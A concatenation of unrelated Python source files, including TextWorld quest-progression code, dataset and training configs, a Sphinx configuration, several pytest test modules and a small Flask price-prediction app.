self._objective = value
@property
def walkthrough(self) -> Optional[List[str]]:
walkthrough = self.metadata.get("walkthrough")
if walkthrough:
return walkthrough
# Check if we can derive a walkthrough from the quests.
policy = GameProgression(self).winning_policy
if policy:
mapping = {k: info.name for k, info in self._infos.items()}
walkthrough = [a.format_command(mapping) for a in policy]
self.metadata["walkthrough"] = walkthrough
return walkthrough
class ActionDependencyTreeElement(DependencyTreeElement):
""" Representation of an `Action` in the dependency tree.
The notion of dependency and ordering is defined as follows:
* action1 depends on action2 if action1 needs the propositions
added by action2;
* action1 should be performed before action2 if action2 removes
propositions needed by action1.
"""
def depends_on(self, other: "ActionDependencyTreeElement") -> bool:
""" Check whether this action depends on the `other`.
Action1 depends on action2 when the intersection between
the propositions added by action2 and the preconditions
of the action1 is not empty, i.e. action1 needs the
propositions added by action2.
"""
return len(other.action.added & self.action._pre_set) > 0
@property
def action(self) -> Action:
return self.value
def is_distinct_from(self, others: List["ActionDependencyTreeElement"]) -> bool:
"""
Check whether this element is distinct from `others`.
We check if self.action has any additional information
that `others` actions don't have. This helps us to
identify whether a group of nodes in the dependency tree
already contain all the needed information that self.action
would bring.
"""
new_facts = set(self.action.added)
for other in others:
new_facts -= other.action.added
return len(new_facts) > 0
def __lt__(self, other: "ActionDependencyTreeElement") -> bool:
""" Order ActionDependencyTreeElement elements.
Actions that remove information needed by other actions
should be sorted further in the list.
Notes:
This is not a proper ordering, i.e. two actions
can mutually removed information needed by each other.
"""
def _required_facts(node):
pre_set = set(node.action._pre_set)
while node.parent is not None:
pre_set |= node.parent.action._pre_set
pre_set -= node.action.added
node = node.parent
return pre_set
return len(other.action.removed & _required_facts(self)) > len(self.action.removed & _required_facts(other))
def __str__(self) -> str:
params = ", ".join(map(str, self.action.variables))
return "{}({})".format(self.action.name, params)
class ActionDependencyTree(DependencyTree):
def __init__(self, *args, kb: Optional[KnowledgeBase] = None, **kwargs):
super().__init__(*args, **kwargs)
self._kb = kb or KnowledgeBase.default()
def remove(self, action: Action) -> Tuple[bool, Optional[Action]]:
changed = super().remove(action)
if self.empty:
return changed, None
# The last action might have impacted one of the subquests.
reverse_action = self._kb.get_reverse_action(action)
if reverse_action is not None:
changed = self.push(reverse_action)
elif self.push(action.inverse()):
# The last action did impact one of the subquests
# but there's no reverse action to recover from it.
changed = True
return changed, reverse_action
def flatten(self) -> Iterable[Action]:
"""
Generates a flatten representation of this dependency tree.
Actions are greedily yielded by iteratively popping leaves from
the dependency tree.
"""
tree = self.copy() # Make a copy of the tree to work on.
last_reverse_action = None
while len(tree.roots) > 0:
# Use 'sort' to try leaves that doesn't affect the others first.
for leaf in sorted(tree.leaves_elements):
if leaf.action != last_reverse_action:
break # Choose an action that avoids cycles.
yield leaf.action
_, last_reverse_action = tree.remove(leaf.action)
def copy(self) -> "ActionDependencyTree":
tree = super().copy()
tree._kb = self._kb
return tree
class EventProgression:
""" EventProgression monitors a particular event.
Internally, the event is represented as a dependency tree of
relevant actions to be performed.
"""
def __init__(self, event: Event, kb: KnowledgeBase) -> None:
"""
Args:
quest: The quest to keep track of its completion.
"""
self._kb = kb or KnowledgeBase.default()
self.event = event
self._triggered = False
self._untriggerable = False
self._policy = ()
# Build a tree representation of the quest.
self._tree = ActionDependencyTree(kb=self._kb,
element_type=ActionDependencyTreeElement)
if len(event.actions) > 0:
self._tree.push(event.condition)
for action in event.actions[::-1]:
self._tree.push(action)
self._policy = event.actions + (event.condition,)
@property
def triggering_policy(self) -> List[Action]:
""" Actions to be performed in order to trigger the event. """
if self.done:
return ()
# Discard all "trigger" actions.
return tuple(a for a in self._policy if a.name != "trigger")
@property
def done(self) -> bool:
""" Check if the quest is done (i.e. triggered or untriggerable). """
return self.triggered or self.untriggerable
@property
def triggered(self) -> bool:
""" Check whether the event has been triggered. """
return self._triggered
@property
def untriggerable(self) -> bool:
""" Check whether the event is in an untriggerable state. """
return self._untriggerable
def update(self, action: Optional[Action] = None, state: Optional[State] = None) -> None:
""" Update event progression given available information.
Args:
action: Action potentially affecting the event progression.
state: Current game state.
"""
if self.done:
return # Nothing to do, the quest is already done.
if state is not None:
# Check if event is triggered.
self._triggered = self.event.is_triggering(state)
# Try compressing the winning policy given the new game state.
if self.compress_policy(state):
return # A shorter winning policy has been found.
if action is not None and not self._tree.empty:
# Determine if we moved away from the goal or closer to it.
changed, reverse_action = self._tree.remove(action)
if changed and reverse_action is None: # Irreversible action.
self._untriggerable = True # Can't track quest anymore.
if changed and reverse_action is not None:
# Rebuild policy.
self._policy = tuple(self._tree.flatten())
def compress_policy(self, state: State) -> bool:
""" Compress the policy given a game state.
Args:
state: Current game state.
Returns:
Whether the policy was compressed or not.
"""
def _find_shorter_policy(policy):
for j in range(0, len(policy)):
for i in range(j + 1, len(policy))[::-1]:
shorter_policy = policy[:j] + policy[i:]
if state.is_sequence_applicable(shorter_policy):
self._tree = ActionDependencyTree(kb=self._kb,
element_type=ActionDependencyTreeElement)
for action in shorter_policy[::-1]:
self._tree.push(action)
return shorter_policy
return None
compressed = False
policy = _find_shorter_policy(self._policy)
while policy is not None:
compressed = True
self._policy = policy
policy = _find_shorter_policy(policy)
return compressed
class QuestProgression:
""" QuestProgression keeps track of the completion of a quest.
Internally, the quest is represented as a dependency tree of
relevant actions to be performed.
"""
def __init__(self, quest: Quest, kb: KnowledgeBase) -> None:
"""
Args:
quest: The quest to keep track of its completion.
"""
self.quest = quest
self.win_events = [EventProgression(event, kb) for event in quest.win_events]
self.fail_events = [EventProgression(event, kb) for event in quest.fail_events]
@property
def _tree(self) -> Optional[List[ActionDependencyTree]]:
events = [event for event in self.win_events if len(event.triggering_policy) > 0]
if len(events) == 0:
return None
event = min(events, key=lambda event: len(event.triggering_policy))
return event._tree
@property
def winning_policy(self) -> Optional[List[Action]]:
""" Actions to be performed in order to complete the quest. """
if self.done:
return None
winning_policies = [event.triggering_policy for event in self.win_events if len(event.triggering_policy) > 0]
if len(winning_policies) == 0:
return None
return min(winning_policies, key=lambda policy: len(policy))
@property
def completable(self) -> bool:
""" Check if the quest has winning events. """
return len(self.win_events) > 0
@property
def done(self) -> bool:
""" Check if the quest is done (i.e. completed, failed or unfinishable). """
return self.completed or self.failed or self.unfinishable
@property
def completed(self) -> bool:
""" Check whether the quest is completed. """
return any(event.triggered for event in self.win_events)
@property
def failed(self) -> bool:
""" Check whether the quest has failed. """
return any(event.triggered for event in self.fail_events)
@property
def unfinishable(self) -> bool:
""" Check whether the quest is in an unfinishable state. """
return any(event.untriggerable for event in self.win_events)
def update(self, action: Optional[Action] = None, state: Optional[State] = None) -> None:
""" Update quest progression given available information.
Args:
action: Action potentially affecting the quest progression.
state: Current game state.
"""
if self.done:
return # Nothing to do, the quest is already done.
for event in (self.win_events + self.fail_events):
event.update(action, state)
class GameProgression:
""" GameProgression keeps track of the progression of a game.
If `tracking_quests` is True, then `winning_policy` will be the list
of Action that need to be applied in order to complete the game.
"""
def __init__(self, game: Game, track_quests: bool = True) -> None:
"""
Args:
game: The game for which to track progression.
track_quests: whether quest progressions are being tracked.
"""
self.game = game
self.state = game.world.state.copy()
self._valid_actions = list(self.state.all_applicable_actions(self.game.kb.rules.values(),
self.game.kb.types.constants_mapping))
self.quest_progressions = []
if track_quests:
self.quest_progressions = [QuestProgression(quest, game.kb) for quest in game.quests]
for quest_progression in self.quest_progressions:
quest_progression.update(action=None, state=self.state)
@property
def done(self) -> bool:
""" Whether all quests are completed or at least one has failed or is unfinishable. """
return self.completed or self.failed
@property
def completed(self) -> bool:
""" Whether all quests are completed. """
if not self.tracking_quests:
return False # There is nothing to be "completed".
return all(qp.completed for qp in self.quest_progressions if qp.completable)
@property
def failed(self) -> bool:
""" Whether at least one quest has failed or is unfinishable. """
if not self.tracking_quests:
return False # There is nothing to be "failed".
return any((qp.failed or qp.unfinishable) for qp in self.quest_progressions)
@property
def score(self) -> int:
""" Sum of the reward of all completed quests. """
return sum(qp.quest.reward for qp in self.quest_progressions if qp.completed)
@property
def tracking_quests(self) -> bool:
""" Whether quests are being tracked or not. """
return len(self.quest_progressions) > 0
@property
def valid_actions(self) -> List[Action]:
""" Actions that are valid at the current state. """
return self._valid_actions
@property
def winning_policy(self) -> Optional[List[Action]]:
""" Actions to be performed in order to complete the game.
Returns:
A policy that leads to winning the game. It can be `None`
if `tracking_quests` is `False` or the quest has failed.
"""
if not self.tracking_quests:
return None
if self.done:
return None
# Greedily build a new winning policy by merging all quest trees.
trees = [quest._tree for quest in self.quest_progressions if quest.completable and not quest.done]
if None in trees:
# Some quests don't have triggering policy.
return None
master_quest_tree = ActionDependencyTree(kb=self.game.kb,
element_type=ActionDependencyTreeElement,
trees=trees)
# Discard all "trigger" actions.
return tuple(a for a in master_quest_tree.flatten() if a.name != "trigger")
def update(self, action: Action) -> None:
""" Update the state of the game given the provided action.
Args:
action: Action affecting the state of the game.
"""
# Update world facts.
self.state.apply(action)
# Get valid actions.
self._valid_actions = list(self.state.all_applicable_actions(self.game.kb.rules.values(),
self.game.kb.types.constants_mapping))
# Update all quest progressions given the last action and new state.
for quest_progression in self.quest_progressions:
quest_progression.update(action, self.state)
class GameOptions:
"""
Options for customizing the game generation.
Attributes:
nb_rooms (int):
Number of rooms in the game.
nb_objects (int):
Number of objects in the game.
nb_parallel_quests (int):
Number of parallel quests, i.e. not sharing a common goal.
quest_length (int):
Number of actions that need to be performed to complete the game.
quest_breadth (int):
Number of subquests per independent quest. It controls how nonlinear
a quest can be (1: linear).
quest_depth (int):
Number of actions that need to be performed to solve a subquest.
path (str):
Path of the compiled game (.ulx or .z8). Also, the source (.ni)
and metadata (.json) files will be saved along with it.
force_recompile (bool):
If `True`, recompile game even if it already exists.
file_ext (str):
Type of the generated game file. Either .z8 (Z-Machine) or .ulx (Glulx).
If `path` already has an extension, this is ignored.
seeds (Optional[Union[int, Dict]]):
Seeds for the different generation processes.
* If `None`, seeds will be sampled from
:py:data:`textworld.g_rng <textworld.utils.g_rng>`.
* If `int`, it acts as a seed for a random generator that will be
used to sample the other seeds.
* If dict, the following keys can be set:
* `'map'`: control the map generation;
* `'objects'`: control the type of objects and their
location;
* `'quest'`: control the quest generation;
* `'grammar'`: control the text generation.
For any key missing, a random number gets assigned (sampled
from :py:data:`textworld.g_rng <textworld.utils.g_rng>`).
kb (KnowledgeBase):
The knowledge base containing the logic and the text grammars (see
:py:class:`textworld.generator.KnowledgeBase <textworld.generator.data.KnowledgeBase>`
for more information).
chaining (ChainingOptions):
For customizing the quest generation (see
:py:class:`textworld.generator.ChainingOptions <textworld.generator.chaining.ChainingOptions>`
for the list of available options).
grammar (GrammarOptions):
For customizing the text generation (see
:py:class:`textworld.generator.GrammarOptions <textworld.generator.text_grammar.GrammarOptions>`
for the list of available options).
"""
def __init__(self):
self.chaining = ChainingOptions()
self.grammar = GrammarOptions()
self._kb = None
self._seeds = None
self.nb_parallel_quests = 1
self.nb_rooms = 1
self.nb_objects = 1
self.force_recompile = False
self.file_ext = ".ulx"
self.path = "./tw_games/"
@property
def quest_length(self) -> int:
assert self.chaining.min_length == self.chaining.max_length
return self.chaining.min_length
@quest_length.setter
def quest_length(self, value: int) -> None:
self.chaining.min_length = value
self.chaining.max_length = value
self.chaining.max_depth = value
@property
def quest_breadth(self) -> int:
assert self.chaining.min_breadth == self.chaining.max_breadth
return self.chaining.min_breadth
@quest_breadth.setter
def quest_breadth(self, value: int) -> None:
self.chaining.min_breadth = value
self.chaining.max_breadth = value
@property
def seeds(self):
if self._seeds is None:
self.seeds = {} # Generate seeds from g_rng.
return self._seeds
@seeds.setter
def seeds(self, value: Union[int, Mapping[str, int]]) -> None:
keys = ['map', 'objects', 'quest', 'grammar']
def _key_missing(seeds):
return not set(seeds.keys()).issuperset(keys)
seeds = value
if type(value) is int:
rng = RandomState(value)
seeds = {}
elif _key_missing(value):
rng = g_rng.next()
# Check if we need to generate missing seeds.
self._seeds = {}
for key in keys:
if key in seeds:
self._seeds[key] = seeds[key]
else:
self._seeds[key] = rng.randint(65635)
@property
def rngs(self) -> Dict[str, RandomState]:
rngs = {}
for key, seed in self.seeds.items():
rngs[key] = RandomState(seed)
return rngs
@property
def kb(self) -> KnowledgeBase:
if self._kb is None:
self.kb = KnowledgeBase.load()
return self._kb
@kb.setter
def kb(self, value: KnowledgeBase) -> None:
self._kb = value
self.chaining.kb = self._kb
def copy(self) -> "GameOptions":
return copy.copy(self)
@property
def uuid(self) -> str:
# TODO: generate uuid from chaining options?
uuid = "tw-{specs}-{grammar}-{seeds}"
uuid = uuid.format(specs=encode_seeds((self.nb_rooms, self.nb_objects, self.nb_parallel_quests,
self.chaining.min_length, self.chaining.max_length,
self.chaining.min_depth, self.chaining.max_depth,
self.chaining.min_breadth, self.chaining.max_breadth)),
grammar=self.grammar.uuid,
seeds=encode_seeds([self.seeds[k] for k in sorted(self._seeds)]))
return uuid
def __str__(self) -> str:
infos = ["-= Game options =-"]
slots = ["nb_rooms", "nb_objects", "nb_parallel_quests", "path", "force_recompile", "file_ext", "seeds"]
for slot in slots:
infos.append("{}: {}".format(slot, getattr(self, slot)))
text = "\n ".join(infos)
text += "\n chaining options:\n"
text += textwrap.indent(str(self.chaining), " ")
text += "\n grammar options:\n"
text += textwrap.indent(str(self.grammar), " ")
text += "\n KB:\n"
text += textwrap.indent(str(self.kb), " ")
return text
|
py | b40b2d264513eb24523d23d94c1d12977dcac5f7 | # -*- coding: utf-8 -*-
# Copyright 2018 The Blueoil Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
import os
import os.path
from blueoil.datasets.pascalvoc_base import PascalvocBase
class Pascalvoc2012(PascalvocBase):
classes = [
'aeroplane',
'bicycle',
'bird',
'boat',
'bottle',
'bus',
'car',
'cat',
'chair',
'cow',
'diningtable',
'dog',
'horse',
'motorbike',
'person',
'pottedplant',
'sheep',
'sofa',
'train',
'tvmonitor',
]
available_subsets = ['train', 'validation', "train_validation"]
extend_dir = "PASCALVOC_2012/VOCdevkit/VOC2012"
@property
def num_max_boxes(self):
# calculate by cls.count_max_boxes(self.skip_difficult)
if self.skip_difficult:
return 39
else:
return 56
def _annotation_file_from_image_id(self, image_id):
"""Return annotation xml file path."""
annotation_file = os.path.join(self.annotations_dir, "{}.xml".format(image_id))
return annotation_file
def _image_file_from_image_id(self, image_id):
"""Return image file name of a image."""
return os.path.join(self.jpegimages_dir, "{}.jpg".format(image_id))
def _files_and_annotations(self):
"""Create files and gt_boxes list."""
if self.subset == "train":
data_type = "train"
if self.subset == "validation":
data_type = "val"
if self.subset == "train_validation":
data_type = "trainval"
image_ids = self._image_ids(data_type)
files = [self._image_file_from_image_id(image_id) for image_id in image_ids]
gt_boxes_list = [self._gt_boxes_from_image_id(image_id) for image_id in image_ids]
print("{} {} files and annotations are ready".format(self.__class__.__name__, self.subset))
return files, gt_boxes_list
|
py | b40b2d4e57e199697d6fe5f28445b77909e3cbbf | dataset_type = 'CocoDataset'
data_root = '/home/wuyang/data/coco/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='Resize', img_scale=(1333, 800), keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
samples_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train2017.json',
img_prefix=data_root + 'train2017/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
# ann_file=data_root + 'annotations/instances_val2017.json',
ann_file=data_root + 'annotations/meta_val2017.json',
# ann_file=data_root + 'annotations/image_info_test-dev2017.json',
img_prefix=data_root + 'val2017/',
# img_prefix=data_root + 'test2017/',
pipeline=test_pipeline))
evaluation = dict(interval=1, metric='bbox')
|
py | b40b2db1c90bd5a9f100e0aa9de710f5794a97e8 | import aquests
def test_get_301 ():
for i in range (1):
aquests.get ("http://pypi.python.org")
aquests.fetchall ()
|
py | b40b2eba31088e9e8c058591c58c46b600af85de | import pytest
skip = False
try:
from simple_settings.strategies.toml_file import SettingsLoadStrategyToml
except ImportError:
skip = True
@pytest.mark.skipif(skip, reason='Installed without Toml')
class TestTomlStrategy:
@pytest.fixture
def strategy_toml(self):
return SettingsLoadStrategyToml
def test_should_check_a_valid_toml_file(self, strategy_toml):
assert strategy_toml.is_valid_file('foo.toml') is True
def test_should_check_a_invalid_toml_file(self, strategy_toml):
assert strategy_toml.is_valid_file('foo.bar') is False
def test_should_load_dict_with_settings_of_toml_file(self, strategy_toml):
settings = strategy_toml.load_settings_file(
'tests/samples/simple_toml_file.toml'
)
assert settings['SIMPLE_STRING'] == 'simple'
assert settings['COMPLEX_DICT'] == {'complex': 'dict', 'foo': 'bar'}
assert settings['COMPLEX_LIST'] == ['foo', 'bar']
assert settings['SIMPLE_INTEGER'] == 1
assert settings['SIMPLE_BOOL'] is True
def test_should_raise_error_invalid_toml_file_content(self, strategy_toml):
with pytest.raises(Exception):
settings = strategy_toml.load_settings_file(
'tests/samples/invalid_toml_file.toml'
)
|
py | b40b2f90afc82523ac32a1c5c67c2884460e69ec | # -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
import datetime
sys.path.insert(0, os.path.abspath('../etk'))
sys.path.insert(0, os.path.abspath('../'))
# -- Project information -----------------------------------------------------
project = 'ETK'
copyright = '{}, USC/ISI'.format(datetime.datetime.now().year)
author = 'USC/ISI'
# The short X.Y version
version = ''
# The full version, including alpha/beta/rc tags
release = '0.0.1'
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc',
'sphinx.ext.napoleon',
'sphinx.ext.viewcode',]
# display base class
autodoc_default_flags = ['show-inheritance']
# extensions = [
# 'sphinx.ext.autodoc',
# 'sphinx.ext.doctest',
# 'sphinx.ext.intersphinx',
# 'sphinx.ext.todo',
# 'sphinx.ext.coverage',
# 'sphinx.ext.mathjax',
# 'sphinx.ext.ifconfig',
# 'sphinx.ext.viewcode',
# 'sphinx.ext.githubpages',
# ]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['docstemplates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path .
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
'page_width': '1380px',
'sidebar_width': '220px',
'github_user': 'usc-isi-i2',
'github_repo': 'etk',
'github_banner': 'true',
'github_type': 'star',
'extra_nav_links': {
'ETK @ GitHub': 'https://github.com/usc-isi-i2/etk/',
'ETK @ PyPI': 'https://pypi.org/project/etk/',
'Issue Tracker': 'https://github.com/usc-isi-i2/etk/issues',
'USC/ISI CKG': 'http://usc-isi-i2.github.io/'
},
'show_powered_by': False
}
html_show_sourcelink = False
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['docsstatic']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
html_sidebars = {
'**': [
'about.html',
'localtoc.html',
'navigation.html',
# 'relations.html',
'searchbox.html',
# 'donate.html',
]
}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'etkdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'etk.tex', 'etk Documentation',
'Sylvia\\_Lin', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'etk', 'etk Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'etk', 'etk Documentation',
author, 'etk', 'One line description of project.',
'Miscellaneous'),
]
# -- Options for Epub output -------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# -- Extension configuration -------------------------------------------------
# -- Options for intersphinx extension ---------------------------------------
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'https://docs.python.org/': None}
# -- Options for todo extension ----------------------------------------------
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
|
py | b40b3191ca980fabbe08390c52b9ef215db6c703 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from glance.api.middleware import cache_manage
from glance.api.v2 import cached_images
import glance.common.config
import glance.common.wsgi
import glance.image_cache
from glance.tests import utils as test_utils
from unittest import mock
import webob
class TestCacheManageFilter(test_utils.BaseTestCase):
@mock.patch.object(glance.image_cache.ImageCache, "init_driver")
def setUp(self, mock_init_driver):
super(TestCacheManageFilter, self).setUp()
self.stub_application_name = "stubApplication"
self.stub_value = "Stub value"
self.image_id = "image_id_stub"
mock_init_driver.return_value = None
self.cache_manage_filter = cache_manage.CacheManageFilter(
self.stub_application_name)
def test_bogus_request(self):
# prepare
bogus_request = webob.Request.blank("/bogus/")
# call
resource = self.cache_manage_filter.process_request(bogus_request)
# check
self.assertIsNone(resource)
@mock.patch.object(cached_images.CacheController, "get_cached_images")
def test_get_cached_images(self,
mock_get_cached_images):
# setup
mock_get_cached_images.return_value = self.stub_value
# prepare
request = webob.Request.blank("/v2/cached_images")
# call
resource = self.cache_manage_filter.process_request(request)
# check
mock_get_cached_images.assert_called_with(request)
self.assertEqual('"' + self.stub_value + '"',
resource.body.decode('utf-8'))
@mock.patch.object(cached_images.CacheController, "delete_cached_image")
def test_delete_cached_image(self,
mock_delete_cached_image):
# setup
mock_delete_cached_image.return_value = self.stub_value
# prepare
request = webob.Request.blank("/v2/cached_images/" + self.image_id,
environ={'REQUEST_METHOD': "DELETE"})
# call
resource = self.cache_manage_filter.process_request(request)
# check
mock_delete_cached_image.assert_called_with(request,
image_id=self.image_id)
self.assertEqual('"' + self.stub_value + '"',
resource.body.decode('utf-8'))
@mock.patch.object(cached_images.CacheController, "delete_cached_images")
def test_delete_cached_images(self,
mock_delete_cached_images):
# setup
mock_delete_cached_images.return_value = self.stub_value
# prepare
request = webob.Request.blank("/v2/cached_images",
environ={'REQUEST_METHOD': "DELETE"})
# call
resource = self.cache_manage_filter.process_request(request)
# check
mock_delete_cached_images.assert_called_with(request)
self.assertEqual('"' + self.stub_value + '"',
resource.body.decode('utf-8'))
@mock.patch.object(cached_images.CacheController, "queue_image")
def test_put_queued_image(self,
mock_queue_image):
# setup
mock_queue_image.return_value = self.stub_value
# prepare
request = webob.Request.blank("/v2/queued_images/" + self.image_id,
environ={'REQUEST_METHOD': "PUT"})
# call
resource = self.cache_manage_filter.process_request(request)
# check
mock_queue_image.assert_called_with(request, image_id=self.image_id)
self.assertEqual('"' + self.stub_value + '"',
resource.body.decode('utf-8'))
@mock.patch.object(cached_images.CacheController, "get_queued_images")
def test_get_queued_images(self,
mock_get_queued_images):
# setup
mock_get_queued_images.return_value = self.stub_value
# prepare
request = webob.Request.blank("/v2/queued_images")
# call
resource = self.cache_manage_filter.process_request(request)
# check
mock_get_queued_images.assert_called_with(request)
self.assertEqual('"' + self.stub_value + '"',
resource.body.decode('utf-8'))
@mock.patch.object(cached_images.CacheController, "delete_queued_image")
def test_delete_queued_image(self,
mock_delete_queued_image):
# setup
mock_delete_queued_image.return_value = self.stub_value
# prepare
request = webob.Request.blank("/v2/queued_images/" + self.image_id,
environ={'REQUEST_METHOD': 'DELETE'})
# call
resource = self.cache_manage_filter.process_request(request)
# check
mock_delete_queued_image.assert_called_with(request,
image_id=self.image_id)
self.assertEqual('"' + self.stub_value + '"',
resource.body.decode('utf-8'))
@mock.patch.object(cached_images.CacheController, "delete_queued_images")
def test_delete_queued_images(self,
mock_delete_queued_images):
# setup
mock_delete_queued_images.return_value = self.stub_value
# prepare
request = webob.Request.blank("/v2/queued_images",
environ={'REQUEST_METHOD': 'DELETE'})
# call
resource = self.cache_manage_filter.process_request(request)
# check
mock_delete_queued_images.assert_called_with(request)
self.assertEqual('"' + self.stub_value + '"',
resource.body.decode('utf-8'))
|
py | b40b32b201117a6595ade7605530ce6547b2d395 | import numpy as np
from numpy import reshape
from flask import Flask, request, jsonify, render_template
import pickle
app = Flask(__name__)
print(__name__)
model = pickle.load(open('model_pricing.pkl', 'rb'))
@app.route('/')
def home():
return render_template('index.html')
@app.route('/predict',methods=['POST'])
def predict():
'''
For rendering results on HTML GUI
'''
print("request values : ", request.form.values())
int_features = [int(x) for x in request.form.values()]
print("int_features : ", int_features)
final_features = [np.array(int_features)]
print("final features : ", final_features)
final_features = reshape(final_features, (-1, 1)).T
print("Reshaped and Transformed final features : ", final_features)
prediction = model.predict(final_features)
print("predicted value : ", prediction)
output = round(prediction[0], 2)
print("rounded output : ", output)
return render_template('index.html', prediction_text='House Price should be $ {}'.format(output))
@app.route('/predict_api',methods=['POST'])
def predict_api():
'''
For direct API calls trought request
'''
data = request.get_json(force=True)
prediction = model.predict([np.array(list(data.values()))])
output = prediction[0]
print('Hello from predict_api ',output)
return jsonify(output)
if __name__ == "__main__":
app.run(debug=True) |
py | b40b34acd24d11c4ccc9aad473852403ae25064b | import os
import time
from builtins import bytes
from datetime import datetime
from granola import SerialSniffer
from granola.utils import (
IS_PYTHON3,
check_min_package_version,
decode_bytes,
int_to_char,
load_serial_df,
)
if IS_PYTHON3:
from unittest.mock import patch
else:
from mock import patch
def test_read_still_works(sniff_sniff, mock_read, return_value=b"Serial's read was called"):
# Given a serial sniffer object
# When we call read
mock_read.return_value = return_value
# Then Serial's read function runs
assert return_value == sniff_sniff.read()
def test_write_still_works(sniff_sniff, mock_write, input=b"string\r"):
# Given a serial sniffer object and some input string
# When we write
mock_write.return_value = len(input)
# Then Serial's write function still runs
assert sniff_sniff.write(input) == 7
def test_sniffer_with_bad_outpath_doesnt_break_serial(mock_read, mock_write):
# Given a sniffer object with an absolute path to a file without permissions (in this case, a directory)
class BadSniffer(SerialSniffer):
outfile = "granola"
# When you initialize an object and call read and write with it.
bad_sniff = BadSniffer()
test_read_still_works(bad_sniff, mock_read)
test_write_still_works(bad_sniff, mock_write)
# Then there are no uncaught exceptions and read and write still work
def test_sniffer_given_no_port_or_path_uses_default():
# Given no com port or path
# When you create a sniffer object at some particular time
